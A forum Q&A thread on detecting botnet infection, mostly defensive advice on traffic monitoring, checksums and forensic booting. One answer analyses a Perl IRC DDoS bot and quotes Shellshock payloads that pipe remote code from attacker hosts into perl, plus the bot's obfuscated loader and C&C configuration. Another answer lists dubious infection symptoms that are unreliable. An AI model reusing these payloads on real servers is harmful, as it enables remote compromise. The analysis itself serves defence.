How do I know if my computer is being used for a botnet-based DDoS attack?

Question

A botnet is a collection of compromised computers, each of which is known as a 'bot', connected to the Internet. When a computer is compromised by an attacker, there is often code within the malware that commands it to become part of a botnet. The "botmaster" or "bot herder" controls these compromised computers via standards-based network protocols such as IRC and http.

Is there a way to detect that your computer is being used in a botnet-based DDoS attack?

There is some tool such as a software that could detect strange traffic and exploit activity from my computer?

Answer 1

There's no easy way to detect whether your machine is part of a botnet. Instead, the best defense is prevention: avoid getting infected in the first place.

There is lots and lots written on how to avoid security breaches, too much to repeat here. For a starter, you could read, e.g., a security guide for non-technical users, Windows hardening, Hardening Linux Server, or Secure Linux Desktop. Happy reading!

Answer 2

Analyzing kernels and executables before they are run is usually a safe practice, but it is best combined with a strong OS access control model, such as SELinux.

While it is difficult to locate backdoors in self-modifying or self-checking code, usually the presence of self-modifying or self-checking code themselves are an indicator of malware. For example, the MANDIANT Red Curtain tool can aid a malware analyst in detecting high entropy in sections of code, or strange names/patterns in these sections.

Additionally, many other practices exist (and not all are documented), such as tracing, emulation, et al. Combining all of these methods into one tool or technique is not common, as malware analysts often shift from static to dynamic analysis and back very quickly (in order to gain perspective). However, a staged approach using a minimal set of tools can accomplish a lot in a very short amount of time. For example, I often use pescanner.py on a PE executable before running it in a sandbox along with PE process memory dumpers and instrumentation for tracing such as PIN.

Some of the recent literature has been increasingly good in this area of research.

Answer 3

First, you can't trust a compromised computer as the output of all utilities could be faked to hide the presence of malicious activities.

I would generally not expect any computer with robust security practices to be part of a bot net. One where you only install code from trusted sources, have strong passwords (that aren't used elsewhere), etc. Unless my ISP says they've received reports of unusual activity from my IP address indicating a potential bot, or a user tells me they were tricked into installing software that didn't do as advertised and they now realize was likely a trojan.

In those cases, I would start testing for signs of a potential bot:

• monitor network activity. Run netstat -- do all connections more or less make sense? (ignore local connections; run whois on foreign IPs I don't recognize). Remember netstat's output could be faked, so you also run wireshark (network analyzer) from another computer (presumed safe) on my local network, and check to see if there's any unusual traffic to/from strange non-local IP addresses (that's not routine stuff from my router/network printer, etc)?

• Boot into a live cd of the same distribution (so you trust the utilities), and run checksums (md5) on important utilities (/bin, /sbin/, /usr/bin/, etc.) and compare to known checksums of a safe computer with the same OS / version (or make a fresh install and run all updates and then generate checksums to compare with). (If the checksums don't match, it could possibly be due to an update of the utility; so check versions and investigate further). I've assumed linux/unix system for this answer, but presumably you could do the same for windows if you know what to check.

If you find evidence of a bot, I'd back up my data (that is non-executables), wipe the hard disk clean, and re-install the OS from a safe source with different passwords. I'd be very wary opening up documents that could contain macros (e.g., doc, pdfs) from the compromised computer (making sure to disable macros in the relevant programs before looking at these files again, not being logged in as administrator/root, and installing a virus scanner).

Answer 4

A really good bot will hide itself from the kernel.

The only way to detect it would be to sniff the traffic between the machine and the internet, using an external, known-good machine. Even then there would be no way to know if the bot was just dormant at the time you looked for it.

Another option is to boot the machine from known-good (preferably read-only) media (e.g. CD or DVD) and do forensic analysis of the machine to look for traces of an infection.

Answer 5

A darknet is also a good way to help discover infected machines on your network. It is essentially a subnet on your LAN that shouldn't normally have traffic routed to it, with logging machines in it, which detect which machines aren't obeying your normal network setup, e.g. scanning for nodes on the network to infect.

Since you should know what behaviour is normal and what isn't, infected machines trying to infect others will stick out like a sore thumb.

Answer 6

There is a tool available from TrendMicro to check Bot infection.

http://free.antivirus.com/us/rubotted/

Answer 7

In order to check if your pc or your network is a bot try kaspersky service https://blog.kaspersky.com/simda-botnet-check/8304/ or RUBotted (http://free.antivirus.com/us/rubotted/) by Trend Micro. it claims to monitor a computer for potential infection and suspicious activities associated with bots.

Answer 8

1) Your battery drains during the times its shutdown.

2) You then discover your PC or laptop never actually shuts down, unless battery or power cord is removed.

3) Your wireless adapter is disabled but you notice there must still be a remote wireless connection. (for a variety of reasons I won't list here)

4) An unknown user has ownership of you C: drive, and more.

5) You've lost access permissions to files in system32 and Programs files(x86) things like Cyberlink, Bluetooth, Microsoft Shell...etc.

6) Your restore points vanished.

7) File Shredder in McAfee or Avast suddenley cant shred, or only appear to.

8) Firewall changes you didnt make.

9) during a system restore outside of the windows partition you notice a box flash by on the screen that says FBI Debug Mode

10) If 9), then "system has been whacked".

Answer 9

U can use a network analyzer. check the outbound traffic. Most attacks staring under the http/tcp/udp protocol with a huge packet size / fast interval.

If your PC connects often to a unkown server / ip and post / connect regulary to it. You can be sure that you are controlled by a C & C Server from a B Master.

Answer 10

Specific answer: DDoS Perl IrcBot v1.0 / 2012 by DDoS Security Team

Disclaimer

• This was done around this specific version of this malware (called later tool)... This is not an general method!

• Playing with malwares and viruses could become harmful! Use a dedicated hardware, user, idealy not connected to Internet!

You've been warned!

Introduction

I post this answer as a practical case, because I've already worked around this tool first time in 2012 and recently, due to ShellShock bug and exploits...

I've become a suspect mail containing same string as: To, References, Cc, From, Subject, Date, Message-ID, Comments, Keywords, Resent-Date and Resent-From:

() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.x.x/ex.txt|perl;lwp-downloa..

I've first find this funny, check around my mail user and server, nothing strange, ok...

To be completely sure, I've tried to download the malware, unfortunely they was dropped from server.

... Some days later, I've seen this in one web sever logs:

... [27/Oct/2014:05:40:56 +0100] "GET /admin.cgi HTTP/1.0"  403 2132 \
        "() { :; }; curl http://202.143.x.x/lib21/index.cgi | perl" \

Where fields referer and user-agent do contain same string. But with another url.

Deobsuscation

This time, I was able to download the tool:

wget http://202.143.x.x/lib21/index.cgi
less index.cgi

#!/usr/bin/perl
use MIME::Base64;
eval (decode_base64('DQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI...
...IyMjIyMj'));

First step, making them readable. For doing this, we just have to replace eval by print:

perl <(sed s/eval/print/ index.cgi) >ircBot.pl

sed -ne '3,11{s/^\(.\{65\}\).*$/\1/;p}' ircBot.pl
#################################################################
##  DDoS Perl IrcBot v1.0 / 2012 by DDoS Security Team       ## [
##      Stealth MultiFunctional IrcBot writen in Perl          ##
##        Teste on every system with PERL instlled             ##
##                                                             ##
##     This is a free program used on your own risk.           ##
##        Created for educational purpose only.                ##
## I'm not responsible for the illegal use of this program.    ##
#################################################################

This was done for educational purpose!?

So we could study...

Testing

You could find a deobfuscated version there. (I'ts not my post, I've found them with exactly same configuration after reading this post)

Nota: For running this kind of tools, I use a dedicated hawdware, not connected and a run a dedicated virtual machine in it, to be able to trace, monitor or stop them from upper level.

    31      ##### [ Configuration ] #####
    32      #############################
    33      
    34      my @rps = ("/usr/local/apache/bin/httpd -DSSL",
    35                         "/usr/sbin/httpd -k start -DSSL",
    36                 "/usr/sbin/httpd",
    37                         "/usr/sbin/sshd -i",
...
    43                         "/usr/sbin/acpid",
    44                         "/usr/sbin/cron");
    45      my $process = $rps[rand scalar @rps];
    46      
    47      my $vers = "\001VERSION - unknown command.\001";
    48      my $ircname = "shock";
    49      my $realname = `uname -vr`;
    50      my $nick = "perl";
    51      
    52      $server = 'fflyy.su' unless $server;
    53      my $port = '8080';
    54      
    55      my $linas_max='10';
    56      my $sleep='5';
    57      
    58      my $homedir = "/tmp";
    59      my $version = 'DDoS Perl Bot v1.0';
    60      
    61      my @admins = ("M","st0n3d","x00","Jorgee");
    62      my @hostauth = ("lolhome");
    63      my @channels = ("#mperl2");
    64      $unamea = `uname -a`;
    65      $uid = `id`;
    66      
    67      my $pacotes = 1;
    68      
    69      #################################################################
    70      ##### [ Stop Editing if you dont know what are you doing. ] #####

Well, on lines 31 to 70, you will find the configuration:

We could already observe that $process is randomly defined from an array of strings, at line 45.

After changing $server, $port, $admins, @hostauth and @channels, I run the tool.

Labs

• First thing to say: this tool heat a lot of CPU. On big system this could be harmless, but on my poor configuration, this was important.

• The bot is connected on my irc. I could ask for him like presented in the header of script, and if I send a /msg, they open a private chatroom I can use like a shell console.

• On server side, once run, they disappear. If I run ps ax, I see a process httpd wich was not there before, but...

Well, enough now. There is some commands I've run to show evidently where it is (of course, all this command is to be run as root or via sudo):

• Searching for running perl executable:

  ls -l /proc/*/exe | grep perl
  lrwxrwxrwx 1 www-data www-data 0 oct 30 09:39 /proc/23664/exe -> /usr/bin/perl
  

  This will show all process using perl as executable. This is not based on cmdline.

• Looking for TCP connections:

  netstat -tanp | grep :8080
  tcp     0   0 192.168.4.3:33083   192.168.4.1:8080   ESTABLISHED 23664/httpd -DSSL
  

  In this specific configuration (generation of malware), the port 8080 is used as remote port. Even if you hold a regular server, using port 8080, this port is used as local port.

• Looking for user's web server pid who is not holded by web server process

  ps --user www-data ho ppid,pid,cmd | sed -ne 's/^ *1 //p'
  23664 /usr/local/apache/bin/httpd -DSSL
  

• Searching for process who eat CPU:

  top
  top - 09:48:00 up 58 days, 21:51,  1 user,  load average: 0.02, 0.03, 0.00
  Tasks:  15 total,   3 running,  12 sleeping,   0 stopped,   0 zombie
  %Cpu(s):  0.7 us,  0.3 sy,  0.0 ni, 98.9 id,  0.0 wa,  0.0 hi,  0.0 si,  0.0 st
  KiB Mem:    262144 total,    88164 used,   173980 free,        0 buffers
  KiB Swap:        0 total,        0 used,        0 free,        0 cached
  
    PID USER      PR  NI  VIRT  RES  SHR S  %CPU %MEM    TIME+  COMMAND
  23664 www-data  20   0  7408 2956 1204 R  91.7  1.1   8:30.73 /usr/local/apac
      1 root      20   0  2152  724  620 S   0.0  0.3   0:36.47 init
   1028 root      20   0  2248  776  568 S   0.0  0.3   0:03.76 rpcbind
   1039 statd     20   0  2324 1072  820 S   0.0  0.4   0:00.00 rpc.statd
  

Killing them.

Well, now it's time to stop this:

kill -9 23664

For further uses, while this tool stay not modified, I've quickly wrote this perlircbotKiller.pl (which can be run with at least same rights than bot himself... or root, guess!)

#!/usr/bin/perl

my @rps=("/usr/local/apache/bin/httpd -DSSL", "/usr/sbin/httpd -k start -DSSL",
   "/usr/sbin/httpd", "/usr/sbin/sshd -i","/usr/sbin/sshd","/usr/sbin/sshd -D",
   "/usr/sbin/apache2 -k start", "/sbin/syslogd", "/sbin/klogd -c 1 -x -x",
   "/usr/sbin/acpid", "/usr/sbin/cron");

opendir my $dh,"/proc";
map {
    open my $fh,"/proc/".$_."/cmdline";
    my $cmdline=<$fh>;
    close $fh;
    $cmdline=~s/\0*$//g;
    if (grep { $cmdline eq $_ } @rps) {
    printf "Sending SIGKILL to process %d\n", $_;
        kill 9, $_;
    }; }
grep { readlink("/proc/".$_."/exe") =~ m|/perl| }
grep { /^\d+$/ }
readdir $dh;

... And my fan is comming slow again...

Dedicated tool

After some rewrite, I wrote a little perl script dedicated to

• search for obfuscated script perl, python or php who hide his name by using apache, acpi, httpd, sshd, etc...

• search for process where parent pid is 1.

• list openned connection

• offer a simple way to kill suspicious process.

  Suspicious process      '5089',
      has parent pid: '1',
      run             '/usr/bin/perl',
      claim to be     '/sbin/syslogd'
      and has port    tcp '8080'
      open to         '93.174.93.80'
  Send SIGKILL to 5089 (Y/n)? Y
  

This work fine with many derivation of currently engeenered malware, but I hope this could work with other malwares using same methods.

Conclusion.

• This tool (the perl irc bot) is not completely invisible, but once runned they do offer everything infected user can do. (With the user's rights).

• This version of shellshock attack don't save the malware on infected system, so a simple reboot could be enough to drop them.

• Care about other tools, attacker can use once this tool is started! Particulary: cron and at, but any script or binary user could run and modify may be infected!

• Care about other local security issues which could permit local privilege elevation too!!